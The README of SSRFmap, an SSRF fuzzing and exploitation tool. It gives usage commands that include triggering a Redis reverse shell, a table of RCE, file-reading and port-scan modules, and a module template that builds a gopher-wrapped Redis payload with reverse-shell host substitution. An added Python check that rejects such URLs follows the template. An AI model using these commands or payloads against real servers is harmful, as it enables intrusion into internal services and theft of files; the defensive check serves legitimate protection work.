Automatic SSRF fuzzer and exploitation tool
SSRFmap

SSRF is often used to leverage actions on other services; this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery (SSRF) is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Guide / RTFM

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST]
                  [--lport LPORT]

optional arguments:
  -h, --help     show this help message and exit
  -r REQFILE     SSRF Request file
  -p PARAM       SSRF Parameter to target
  -m MODULES     SSRF Modules to enable
  -l HANDLER     Start an handler for a reverse shell
  --lhost LHOST  LHOST reverse shell
  --lport LPORT  LPORT reverse shell

The default way to use this script is the following.

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Trigger a reverse shell through a Redis service
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l creates a listener for the reverse shell on the specified port
# --lhost and --lport work like in Metasploit: these values are used to build the reverse shell payload

A quick way to test the framework is to run the data/example.py SSRF service and point SSRFmap at it.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules

The following modules are already implemented and can be used with the -m argument.

Name         Description
fastcgi      FastCGI RCE
redis        Redis RCE
github       GitHub Enterprise RCE < 2.8.7
zabbix       Zabbix RCE
mysql        MySQL command execution
smtp         SMTP send mail
portscan     Scan ports for the host
networkscan  HTTP ping sweep over the network
readfiles    Read files such as /etc/passwd

Contribute

I <3 pull requests :) Feel free to add any feature listed below or a new service.

The following code is a template if you wish to add a module interacting with a service.

from core.utils import *
import logging

name        = "servicename in lowercase"
description = "ServiceName RCE - What does it do"
author      = "Name or pseudo of the author"

class exploit():

    def __init__(self, requester, args):
        logging.info("Module '{}' launched!".format(name))

        # Data for the service: the URL-encoded protocol exchange, wrapped in a gopher:// URL
        ip   = "127.0.0.1"
        port = "6379"
        data = "*1%0d%0a$8%0d%0af[...]save%0d%0aquit%0d%0a"
        payload = wrapper_gopher(data, ip, port)

        # Handle args for reverse shell: prompt when --lhost / --lport were not given
        if args.lhost is None: payload = payload.replace("SERVER_HOST", input("Server Host:"))
        else:                  payload = payload.replace("SERVER_HOST", args.lhost)

        if args.lport is None: payload = payload.replace("SERVER_PORT", input("Server Port:"))
        else:                  payload = payload.replace("SERVER_PORT", args.lport)

        # Send the payload through the targeted SSRF parameter
        r = requester.do_request(args.param, payload)
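The modules table and the template above show what every SSRFmap module needs from the target: a URL parameter that accepts a non-HTTP scheme (gopher:// from wrapper_gopher, file:// for readfiles), a loopback or private destination such as 127.0.0.1:6379, and CR/LF (%0d%0a) inside the URL to speak the service's protocol. The check below is an added example, not part of SSRFmap, of how a fetcher on the defending side can refuse exactly those inputs; the function name and the constructed sample URLs are assumptions.

```python
# Added example (not SSRFmap code): allow-list check for a user-supplied URL
# parameter, written against the three things SSRFmap's modules rely on.
from urllib.parse import urlsplit, unquote
import ipaddress

ALLOWED_SCHEMES = {"http", "https"}


def classify_url(url: str) -> list[str]:
    """Return the reasons a fetcher should refuse this URL (empty list = allowed)."""
    reasons = []
    parts = urlsplit(url.strip())

    # 1. Scheme: gopher:// (wrapper_gopher), file:// (readfiles), dict:// etc.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        reasons.append("scheme not allowed: {}".format(parts.scheme or "(none)"))

    # 2. Destination: loopback / private / link-local literals (portscan,
    #    networkscan, redis on 127.0.0.1:6379). Hostnames are not resolved here.
    host = parts.hostname  # lowercased, IPv6 brackets already stripped
    if not host:
        reasons.append("missing host")
    else:
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            addr = None  # a hostname, not an IP literal
        if addr is not None and (addr.is_loopback or addr.is_private
                                 or addr.is_link_local or addr.is_reserved
                                 or addr.is_unspecified):
            reasons.append("destination is an internal address: {}".format(addr))
        elif host == "localhost" or host.endswith(".localhost"):
            reasons.append("destination is localhost")

    # 3. Protocol smuggling: the %0d%0a that the Redis template payload uses
    #    to separate RESP commands decodes to a raw CR/LF.
    decoded = unquote(url)
    if "\r" in decoded or "\n" in decoded:
        reasons.append("CR/LF in URL (protocol smuggling)")

    return reasons


if __name__ == "__main__":
    # Constructed sample: the shape of a gopher-wrapped Redis payload (harmless "quit").
    for sample in ("https://example.com/api",
                   "gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a",
                   "file:///etc/passwd"):
        print(sample, "->", classify_url(sample) or "allowed")
```

Hostnames are deliberately not resolved here; a real fetcher must resolve them and apply the same address check to the resolved address at connect time, otherwise a name pointing at 127.0.0.1 passes.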

You can also contribute with a beer IRL or with buymeacoffee.com


Thanks to the contributors

  • ???

Inspired by